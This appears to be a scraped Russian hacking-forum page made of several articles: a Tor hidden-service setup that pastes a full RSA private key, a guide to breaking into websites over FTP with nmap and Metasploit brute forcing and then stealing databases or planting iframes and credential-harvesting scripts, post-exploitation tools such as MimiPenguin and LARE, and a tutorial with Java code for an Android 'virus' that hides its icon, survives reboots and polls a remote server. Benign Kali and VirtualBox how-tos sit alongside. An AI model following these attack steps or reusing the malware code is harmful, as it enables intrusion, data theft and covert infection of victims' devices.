файле записано имя вашего сайта, а во втором уникальный код. Если пункт 1 не был вами выполнен, то вы должны получить вывод в текстовом документе. Из него нам и нужно вписать необходимые значения. Если вы начинали со 2 пункта, то можете ничего не трогать. К примеру в hostname впишем nameforbso3xx.onion а в private_key: Код: -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+dO6h1GjQD0Hqn2LLBX0kIA9px/CtxV5yxMCjbk773igLvXDu v7N9Kr1FYB+yKuSWL/aCZttLqiqUA4L3cxI5Dgtk3bRKkmZre9qfH9xU9v+RSr5P BQmtp0AMi2wLiZxGggkoqcdIhKC4WWoD1xks0H//f7D+G+rdh4IMOHj7kQIEAPC0 RQKBgAwEVw9kxxu/SIugn3dDXJ2tq8V/uGNMBm02MnhckgvIS6S9wfB60mjy3FG/ SUPCWE/f5pUx8fNb3aPnIg2C5FlSE8hAfzdVBIP5F3S2KacSeCL+DPgCpcM8Tkfh s5AaqHe5Z+cb2pLE/1VXQpnnSQhLuSQFresIMCxnaBjOizzJAkEA4laycqQo2Guu eGkppcdNDRnlI4+bCslp2C4ZOuv8/DaLsQ/UE+RMrhdmJi48bcGBafcQlfewdyvL FpF6cpzjtQJBANdqdFilmRwCi1Ij4Q3dBubjjo5+WzxeZ0A6M6g5HDPFZBuHoXtI LNbSz5ilriQQ8fhKZi1HpwVWhNNLyIB3me0CQCdn1d98SwNP+gIfyvYT5ufxoBfH ElngrkQr4rYhsbCmSorxfen9gxI1hQVy4DsbTfttzSwJmOZ5P/CBG+HPFjUCQQCB gWh+P0wOCUDfkRDXdVd1Tb/7nbPbk8r+VlVgnz7fMNPYzjVkq2DTsRvk8uWTdMwQ bTDrrSiO0Wv5zxmMocT9AkEAkLfNSgZafRVmipGo9Fn78ZqedvZAqfYkwXgoIfrB MEq+FK1D3nyY9QDukbe6uR7k8gTfqTtqiHwIQ5JX7u6v7w== -----END RSA PRIVATE KEY----- В /etc/lighttpd/lighttpd.conf поменяем значения: Код: server.document-root = "/var/www/onion" server.error-handler-404 = "/404.php" server.tag = "Ваше значение" server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) } server.dir-listing = "disable" Пункт 3 Мы находимся во времена технологий, поэтому использовать движки можно в широких направлениях, в которых необходимы PHP и MySQL, поэтому прямо сейчас мы их добавим. Начнем с установки PHP Код: apt-get install php7.0-cgi Далее в /etc/php/7.0/cgi/php.ini ищем и потом раскомментируем строку: Код: cgi.fix_pathinfo = 1 Теперь в lighttpd нам нужно включить поддержку PHP Код: lighttpd-enable-mod fastcgi lighttpd-enable-mod fastcgi-php Пункт 4 В данном пункте мы установим на наш сайт MySQL, а также модуль PHP позволяющий работать вместе с ним. Код: apt-get install mysql-server php7.0-mysql Изначально MySQL использует для кодировки latin1, хотя многие другие движки работают с UTF-8. Поэтому нам нужно открыть /etc/mysql/my.cnf и добавить в секции [client] и [mysqld] данные строки: Код: [client] default-character-set=utf8 [mysqld] character_set_server=utf8 collation_server=utf8_unicode_ci Пункт 5 В /vat/www/ необходимо создать папку onion. Там мы будем размещать наш сайт. Создаем HTML-страницу для проверки, после чего сохраняем ее под названием index.html Код: Тестовая страница Site Local Тестовая страница. Веб-сервер работает и настроен правильно. Создаем PHP страницу ошибки и сохраняем ее как 404.php Код: 404 Site Local Ошибка 404. Страница не найдена. Произведем перезапуск службы: Код: service tor restart service lighttpd restart service mysql restart Пункт 6 В браузере TOR заходим на наш созданный onion-адрес и сразу замечаем результаты! Было бы неплохо в /root/***/tor-browser_en-US/Browser/TorBrowser/Data/Tor/torrc в самом низу добавить строчку ExcludeNodes {ru}, {ua}, {be} Для запуска сайта вводим строки в терминал: Код: service tor start service lighttpd start service mysql start Установим tor-arm который позволит управлять и вести контроль над трафиком Код: apt-get install arm
-
Всем привет, в этой статье речь снова пройдет про взлом, однако теперь взламывать мы будем сайты с помощью FTP. Рассказывать о конкретных ресурсах я не собираюсь, так как поиск жертвы лежит на ваших плечах. Безусловно, администраторы сайтов могут быть не такими глупыми и просто закрывают все порты, устанавливают сложные пароли на различные интерфейсы и так далее. Такой сайт взломать станет намного сложнее. Однако, никогда не стоит забывать, что абсолютной защиты не существует. Что-то созданное человеком, им же и взламывается, особенно если учитывать тот факт, что чаще всего администраторы не закрывают порты, не производят привязку по ИП и устанавливают ненадежные пароли. Также не производят обновление программного обеспечение. Этот факт является очень плохим для жертвы, а для нас очень хорошим. Первым делом сканирование портов. Существует множество программ, как автоматизированные сканеры, так и самописные скрипты, если говорить коротко, то их большое множество. Если вы обладаете большим мастерством в хакинге, то можете использовать Kali Linux со встроенными утилитами. Если немного отвлечься, то Kali Linux невероятная операционка, которая позволяет проводить огромное множество манипуляций для взлома. Чтобы сканировать порты я взял программу NMAP Итак, переходим в консоль и записываем следующее: Nmap –p 21 [ип жертвы] Если порт будет открыт, ты мы увидим вот это: По стандарту для подключения по FTP нужен логин и пароль, однако в некоторых случаях можно зайти и анонимно. Чтобы найти этот анонимный вход хакеру нужно воспользоваться metasploit: use auxiliary/scanner/ftp/anonymous set rhosts [ип жертвы] exploit Если в этих строках вы заметили слово READ то можете поздравить себя, так как это значит, что подключится к FTP можно без логина и пароля. Подключаемся к серверу Чтобы осуществить это вы можете использовать любую программу, просто записываем ИП адресс сайта жертву, порт 21 и любой произвольный логин с паролем. Если прошлые пункты прошли успешно, то все должно работать. Итак, а что если совершить анонимный вход невозможно? В таком случае мы опять обращаемся к metasploit и вводим следующий код: use auxiliary/scanner/ftp/ftp_login set rhosts [ip жертвы] set user_file /root/docs/user.txt set pass_file /root/docs/pass.txt set stop_on_success true exploit Да, вы все правильно поняли, мы будем брутить с помощью metasploit’а В текстовых документах user и pass будут сохранятся произвольный логины и пароли пользователей. Их легко найти целыми пачками в интернете, причем не вкладывая ни копейки. Поиски не затянутся, а найти можно паки с более 10 млн записей. Когда вы получили доступ к FTP вы сможете заполучить очень ценные БД, после чего слить их на специальных ресурсах или же вы можете внедрить какой-нибудь вирус. Не будем жестить, поэтому рассмотрим самые стандартные варианты: • Внедрение iframe с вашей партнерской программы размеров в 1 пиксель, за которые вы будете получать деньги. • В каком-либо HTML-файл на сайте установить перенаправление на необходимый вам ресурс. • Установка в какую-либо часть сайта скрипт, который будет запрашивать информацию пользователя. • Также огромное множество других вредоносных кодов. Это все что я хотел рассказать сегодня. Я не призываю никого к действиям, а лишь хочу обезопасить владельцев сайтов, показа как легко обходятся различные защиты.
-
Привет, всем, из названия статьи вы уже узнали о чем пойдет речь, но все я же скажу немного поподробнее. mXtract – это программа с открытым исходным кодом для Linux, с помощью нее можно проводить анализ и создавать дампы памяти. Данная программа была создана для пентестов, чтобы находить в памяти закрытые ключи и пароли, используя при этом словарь регулярных выражений. Чаще всего в дистрибутивах Линукс можно получать права на получения содержимого памяти процесса, а это значит, что хакеры могут заполучить данные, которые будут прочитаны ими как открытая книга. Итак, небольшой список того, что умеет данный инструмент: Ввод регулярных выраженийУдобный вывод информацииМожно проводить массовые сканированияУстановление определенной точки сканированияДамп памяти, который можно обработаться сразу же с помощью иных утилит. Установка Компиляция: g++ -std=c++11 -O2 src/main.cpp -o mxtract Список команд: -v Enable Verbose Output -s Suppress Banner -h Help -c suppress colored output -r= Regex DB -a Scan all memory ranges not just heap/stack -w Write raw memory to file Default directory is pid/ -o Write regex output to file -d= Custom Ouput Directory -p= Specify single pid to scan Either -r= or -w needed
-
- mxtract
- инструмент
- (and 10 more)
-
Друзья, сегодня минимум слов, максимум дела! В материале ниже будем смотреть инструменты пост-эксплуатации для систем Linux! Что можно сделать после того как ты уже прорвался во внутренний периметр сети, или, как на CTF-соревнованиях, когда ты получил доступ к уязвимой тачке и готов броситься в бой дальше! Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Фазы (этапы) проведения тестирования на проникновение Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации: получить доступ на выполнение произвольного кода\команд изучение данных, хранящихся на сервере перехват данных, которых нет на системе сейчас, но они могут появиться в будущем организация перманентного доступа к целевой системе эскалация привилегий до уровня системы для непривилегированной учетной записи Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры: конфигурацию системы (логин и пароль к БД в исходных кодах) конфигурацию веб-сервера (например, httpd.conf, .htaccess) исходные коды приложения (поиск уязвимостей, анализируя логику приложения) доступы к окружению (находясь внутри сети может быть проще попасть на соседние сервера и изолированные сегменты подсети) базы данных (аутентификационная информация к другим системам, хранящаяся в них Обзор инструментов пост-эксплуатации Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget https://raw.githubus...ster/PXEnume.sh Установка: # git clone https://github.com/s...uong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone https://github.com/N...h-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone https://github.com/h...gal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone https://github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-dayили устаревший софт,
-
- инстурмент
- метод
- (and 11 more)
-
Всем привет, хочу обсудить тему анонимных операционных систем, ведь зачастую пользователи считают, что после установки такой ОС, они становятся неуязвимыми. Однако, как вы возможно уже догадались, это суждение является неверным. Скажу больше, оно может стать крайне отрицательным для таких пользователей. Ведь операционная система является лишь инструментом, которым управляете именно вы. Помните, что лучший способ обезопасить себя – это думать собственной головой. Поэтому рассмотрим, что не стоит делать при работе с ОС. 1.Не изменяйте настройки внутри системы, особенно если ты плохо в этом разбираешься. Если вы решили поковыряться в настройках, не имея при этом знаний, то это будет явно не лучшей затеей. Не пытайтесь изменить прокси, авось все будет работать как прежде. Конечно, скорее всего все будет работать, но в случае изменения ты можешь потерять защиту и спалить свой настоящий ИП. Не включайте в TAILS впн не пойми от кого. Если она не поддерживает впн, то это не со зла и не от недобросовестности программистов. А для того, чтобы обезопасить тебя, ведь часто такие впн только ослабят вашу анонимность. 2. Не открывайте входные двери, если вы имеете в распоряжении анонимную ОС. Никаких проверок почты, счетчиков и никаких сходить за сигаретами. Если вы сидите в анонимной системе, то сидите и делайте то, что вам нужно. Если же ты хочешь открыть входную дверь, даже на пару секунд, то тогда вырубай все это дело, прячь и только после этого открывай. По-другому никак, но почему? Все легко. Например вы можете находится под наблюдением у тех, кому необходимы ваши данные. Они прекрасно понимают, что он под шифром. Конечно, они могут ворваться к тебе и сломать тебе пару костей, чтобы ты сказал ключи. Однако для этого понадобится время, за которое вашу пропажу из сети успеют спохватиться ваши соучастники. Но самым простым способом получить зашифрованные данные, это дождаться того момента, когда человек откроет ту самую дверь, с этим наверное справится даже ребенок. 3. Не посещайте сайты, которые не предназначены для работы. Социальные сети, ютуб и прочее сразу же отбрасываем. Тут есть небольшая закономерность, чем больше таких сайтов посетил – тем больше наследил. Поэтому пользуемся только сайтами для работы. Все остальное отсеиваем и делаем на другой операционной системе, где мы эти не занимаемся. 4. Не скачивай файлы и не переноси с других носителей. Если ты пользуешься анонимной операционкой, то абсолютно не желательно что-то скачивать на нее или переносить с флешек. Ведь с данной информацией приходят и проблемы. Конечно, операционка все это забудет, даже вредоносный софт, однако забудет только после ребута. Поэтому если вы стартанете вирус, то он будет работать на протяжении того времени, сколько работали и вы. Но, если все же вам очень нужно перенести информацию, то выполняем следующие пункты: 1.Производим установку пакетов: rkhunter, chkrootkit, clamtk 2. Прозводим обновление базы clamtk 3. Выполняем переноси информации 4. Отключаем компьютер от интернета, я имею ввиду, что нам нужно отключить провод от роутера или от самого устройства. 5. Производим запуск или чтение информации. 6. После чего проверяем всю систему тремя вышеуказанными программами 5. Не используйте свои коронные фразы Наверняка у вас есть какие-то собственные фразы, которые вы часто употребляете сидя на форумах. Если же вы работает в анонимной операционке, то я рекомендую воздержаться от их использования. Ведь это будет являться кросспостингом, с помощью него раскрывают анонимность пользователя в торе. Складывается среднее количество символов, знаков препинания, ошибок, ключевых слов и многое другое. Когда вся эта информация соберется, будет составлен сетевой портрет, после чего по нему начинается поиск в социальных сетях, форумах и так далее. Как показывает практика, практически всегда находят того, кто пытается скрыться.
-
- рекомендации
- операционная система
- (and 9 more)
-
Приветствую всех хакеров, пентестеров и других пользователь Кали Линукс, сейчас я бы хотел рассмотреть тему медленного обновления данной операционной системы. Многие кто пользуется ей, наверняка, задают себе очень частый вопрос. А почему же имея даже великолепную скорость интернета, скорость обновления оставляет желать лучшего. Итак, начнем исправлять эту плачевную ситуацию. Для начала вам будет необходимо сменить перечень репозиториев в файле sourcle.list на Kali Linux Mirror, который является быстрее привычной нам версии. Чтобы найти все зеркала, то вы можете обратиться на сайт - http.kali.org/README.mirrorlist Вы будете должны изменить свой перечень в файле sourcle.list, найти вы его сможете вписав эту команду: Sudo gedit etc/apt/sources.list Далее переходим на тот самый сайт и выбирайте то зеркало, у которого вы увидите минимальное кол-во ответов Prio. Далее нам нужно будет изменить ссылку, которая относится к выбранному нами зеркалу. Например, выберем этот адрес – http://mirrors.dotsrc.org/kali/README Чтобы продолжить, нам нужно будет удалить из ссылки лишние символы. То есть у нас должно получиться вот так - http://mirrors.dotsrc.org/kali/ Если вы имеете желание, то после некоторых проверок вы можете использовать и протокол https. Теперь как вы могли догадаться, вам необходим открыть source.list и заменить старый адрес на тот, который вы вбрали с данного сайта. Если вы выполнили все пункты, а самое главное выполнили правильно, то после этого адреса должны измениться на новые. Далее вы можете изменить DNS адрес, обычно те, которые стоят по умолчанию имеют сомнительные скорости. Поэтому вы можете поменять их на более быстрые, например, от Гугл. Поэтому обязательно смените DNS адрес и опять сохраните файл. А теперь последний пункт, но не менее важный – это преждевременная очистка кэша apt, чтобы запустить очистку вам нужно написать данную команду – apt clean. Все, все пункты выполнены, поэтому вы можете приступать к обновлениям вашей операционной системы. Если вдруг вы забыли, то я вам напомню, что происходит это с помощью данной команды: sudo apt-get update && apt-get upgrade Поверьте, после того как выполните все данные действия, вы сразу же сможете заметить, что скорость обновления значительно возросла, что не может не радовать. Ведь часто такие обновления могут занимать достаточно большое количество времени.
-
- исправление
- работа
- (and 12 more)
-
Привет всем, сегодня я вас научу такому ремеслу, как создание вирусов на Android Тут нет ничего сложно, просто следуйте описанным шагам. 1.Производим установку java для разработчиков с официального сайта. 2. Скачиваем программу – Android Studio. Скачивайте полную версию, не буду вам рассказать обо всем, сейчас это вам не требуется 3. Наливайте чаю и берите с собой пончики. Сейчас нам придется все это дело установить и настроить. 4. Везде тыкаем далее, нам не требуется вся та информация. Зачем наполнять голову лишними вещами? 5. После установки всего этого набора, производим запуск студии. Наверху нам нужно будет найти кнопку SDK Manager. Она находится по правую сторону. Нажимаем, отмечаем галочками все пункты и начинаем скачивание. 6. Продолжаем пить чай с пончиками. Сейчас процесс будет идти дольше, так как будут устанавливаться различные функции. 7. На этом этапе все закончено. С чего же начнем? Итак, мы все установили и теперь задаем вопросом, а как же нам написать вирус? Поэтому нажимаем File – New – New project. Здесь нам нужно будет ввести название программы. Естественно пишем все что угодно. Благодаря этим данным формируется специальное имя, которое будет являть уникальным название вашего APK. Идем дальше. Тут нам будет предложено на выбор платформы, на которых будет работать наш вирус. Естественно, здесь мы выбираем “Телефон”. Просто остальные пункты расскажу позже. Дальше. Теперь нужно выбрать, каким будет стартовое окно при запуске приложения. Тут есть важное примечание. Что код был активирован сразу после того, как программа будет установлена, нужно выбрать любое окно. Поэтому можете выбрать что угодно, но не No Activity. Но рекомендую взять Empty. Можно будет более легко убрать весь мусор. Дальше. Записываем название и нажимаем кнопку Finish. Ты слишком большой! Теперь пробуем собрать все эти куски в апк файл. Build – Generate signed apk. Что же можем наблюдать? Апк файл с 1 окном и приложением, которое ничего не умеет. Занимает целый 1 МБ. С этим нужно что-то сделать, а если быть точнее, то отключить библиотеки, которые добавляют красивую графику, которая как вы могли догадаться – не требуется. Переходим в Main.Activity.java Изменяем public class MainActivity extends AppCompatActivity на import android.support.v7.app.AppCompatActivity; После этих действий нам нужно перейти в настройки и во вкладке Depends уничтожить строку AppCompat. После этого идем к файлу values.xml и styles.xml. Также отправляем их на мусорку. Переходим в androidManifest.xml и изменяем android:theme="@style/AppTheme" на android:theme="@android:style/Theme.Translucent.NoTitleBar" Опять собираем все по кусочкам, вуаля! Размер менее 50 килобайт. С этим уже можно работать Прятки Следующий этап по списку – это необходимость в скрытии нашего вируса. Для того, чтобы иконка исчезла. А также нужно, чтобы приложение закрывалось. Вставляем после setContentView(R.layout.activity_main) Данный код: String pgkname = getApplicationContext().getPackageName(); ComponentName componentToDisable = new ComponentName(pgkname,pgkname+".MainActivity"); getApplicationContext().getPackageManager().setComponentEnabledSetting( componentToDisable, PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP); Данный код сделаем иконку невидимой. После этого необходимо написать 1 finish(); Теперь после установки, приложение моментально закрывается и исчезает с глаз жертвы. Мы уже сделали неплохие успехи, однако нужно идти дальше. Открывайте, мы пришли! Что же требуется теперь? А теперь нам нужно, чтобы эта программа начала проситься в админку. Тут предполагается, что админа уже присутствует и нам нужно к ней проситься. Мы будем использовать самый простой метод и к сожалению он не будет стабильно работать на версиях Android 4+. Но все же нужно с чего начинать. Нам необходимо создать сервис. Чтобы это сделать – создаем файл с новым class. Пишем необходимое название класса, я выберу – Network. Дальше. Удаляем весь код кроме самой первой записи и меня его на это: import android.app.Service; import android.content.Intent; import android.os.IBinder; import org.apache.http.HttpResponse; import org.apache.http.client.HttpClient; import org.apache.http.client.methods.HttpGet; import org.apache.http.client.methods.HttpPost; import org.apache.http.entity.StringEntity; import org.apache.http.impl.client.DefaultHttpClient; import java.io.InputStream; import java.util.Timer; import java.util.TimerTask; public class Network extends Service{ @Override public int onStartCommand(Intent intent, int flags, int startId) { return Service.START_STICKY; } @Override public IBinder onBind(Intent intent) { throw new UnsupportedOperationException(""); } @Override public void onCreate() { MyTimerTask myTask = new MyTimerTask(); Timer myTimer = new Timer(); myTimer.schedule(myTask, 10000, 10000); } class MyTimerTask extends TimerTask { public void run() { String result = ""; result = GET("http://site.ru/?q="); // Обработка result } } public String GET(String url){ InputStream inputStream = null; String result = ""; try { HttpClient httpclient = new DefaultHttpClient(); HttpResponse httpResponse = httpclient.execute(new HttpGet(url)); inputStream = httpResponse.getEntity().getContent(); if(inputStream != null) result = convertInputStreamToString(inputStream); else result = ""; } catch (Exception e) { } return result; } } Данный код будет описывать класс, который при запуске, включает таймер и каждые десять секунд отправляет запрос на URL-адрес и просит ответа. Но мы не закончили. Данный код не заработает если этот сервис будет объявлен в манифесете и у него не будет доступа к интернету. Переходим в манифест Вписываем туда это А в описании application Теперь, нам нужно лишь запустить сервис. Переходим в MainActivity и перед finish() вписывает его запуск. getApplicationContext().startService(new Intent(getApplicationContext(), Network.class)); Вот и финиш Теперь у нас есть приложение, которое открывается, скрывается и запускает отпуск в админ панель. Однако мы забили очень важную вещь, а что если телефон перезапустят? В этом случае, наш АПК больше никогда не будет запущен. Чтобы устранить это, опять идем в манифест Для этого добавляет права на старт после перезапуска Так же нужно добавить обработчик в application android:name=".Boot" android:enabled="true" > После того как будет произведет перезапуск, будет запущен класс Boot. Но для этого его нужно создать, выполняет все как я описывал в прошлом примере, оставляя лишь начальную информацию. import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; public class Boot extends BroadcastReceiver { @Override public void onReceive(Context context, Intent arg1) { context.startService(new Intent(context, Network.class)); } }
-
В данной статье мы на практике рассмотрим, как установить и запустить виртуальную машину с дистрибутивом Linux, а именно – Kali Linux. Данная операционная система была выбрана по причине того, что она является стандартным дистрибутивом, с которым должен ознакомиться каждый хакер, не смотря на то, чем он занимается. Сперва нам нужно выбрать ПО, которое поможет нам поставить виртуальную машину и в будущем запустить ее. Самые популярные для этого Virtual Box и VMware. Скажу сразу, что во 2 варианте существует два продукта, первый платный, второй собственно бесплатный, у которого есть ограничения в функционале. Мы же буем рассматривать на примере Virtual Box. 1.Установка виртуальной машины Первым делом, нам нужно сказать, а после чего установить ПО с официального сайта. После того как скачивание было завершено – устанавливаем. Никаких трудностей это не составляет. 2. Поиск образа Когда виртуальная машина установлена, вам нужно найти образ ОС, которые потребуется для установки. Однако существует и другой вариант – это скачивание готовой ВМ, которую можно будет импортировать. На официальном сайте Kali Linux вы сможете найти раздел с образами операционной системы, а также готовые машины для двух вышеупомянутых программ. Если вы скачиваете готовую ВМ, то вы скачаете файл формата .ova который является запакованной виртуальной машиной, которую нужно будет всего лишь импортировать в выбранную программу.Если вы скачиваете образ диска, то вы скачаете файл формата .iso который является вымышленным диском, с которого вы и будете производить установку операционной системы как на компьютере.Как первый так и второй вариант имеет свои преимущества и недостатки, главными преимуществами импортирования ВМ является высокая скорость выполнения данного действия. С диска же установка может длится и по тридцать минут. Но довольно часто готовые виртуальные машины требуется длительно обновлять, так как создают они не так часто, а вот обновлениями радуют довольно много, ко все прочему вы не сможете контролировать некоторые параметры при установке. 3. Добавление ВМ с помощью импорта образа. После того, как вы скачаете ВМ, вам нужно будет произвести импорт в VirtualBox. Для этого нажимаете “Файл”, затем “Импорт конфигураций”, дальше ищем образ нашей виртуалки. После чего жмем “Далее” и нам откроется окно. В открывшемся окне будет написана вся конфигурация виртуалки, после импорта вы сможете изменить большую часть настроек, но рекомендую менять путь хранения сразу, так как по умолчанию он установится на диск C. Будет куда лучше разбивать диски под информацию и под виртуальные машины. Также, здесь вы сможете поменять кол-во оперативной памяти и количество используемых ядер. Выделяйте не меньше двух гигобайт, и если есть возможность – два ядра. После того как настройка будет закончена, тыкайте на кнопку “Импорт” и ожидайте завершения. Иногда при импортировании Kali Linux появлялась проблема. Происходила ошибка, которая касалась USB контроллера. Если у вас появилась такая ошибка, то попробуйте отключить USB в настройках ВМ, если способ не поможет, то поищите информацию по этому поводу в интернете. 4. Установка виртуальный машины с образа диска После того, как вы скачаете образ диска с дистрибутивом вам будет нужно создать новую ВМ и произвести запуск с этого диска. Тыкаем “Создать”, после чего появляется окно, в котором мы выбираем тип операционной системы, в нашем случае Linux, дальше версию и ввести имя. В окне настройки выбираем кол-во RAM памяти, опять же, рекомендую не менее 2 гигабайт.Если создаете новую виртуальную машину, то в следующем окне выбирайте “Создать новый виртуальный жесткий диск”.Далее рекомендую выбирать как тип вашего жесткого диска – VMDK, так как совместим со всем другим ПО.В следующем окне выбирайте формат диска, рекомендую ставить динамический, так как иногда бывает не ясно, сколько нужно будет установить программ.После этого появится окно с вводом имени диска, расположение и начальным объемом.После всех этих действий ВМ будет создана Дальше нам нужно будет добавить виртуальный привод. Тыкаем на кнопку “Носители”, далее “контроллер IDE”, дальше справа выбираем “Оптический привод” ищем диск и включаем функцию “Выбрать образ оптического диска” после этого находим образ нашей операционной системы. Когда вы выполните все вышеуказанные действия вы можете запустит виртуальную машину, нажатием кнопки “Запуск”. После этого начнется непосредственная установка операционной системы, нужно будет лишь следовать указанным пунктам.
-
- виртуалка
- шифрование
- (and 12 more)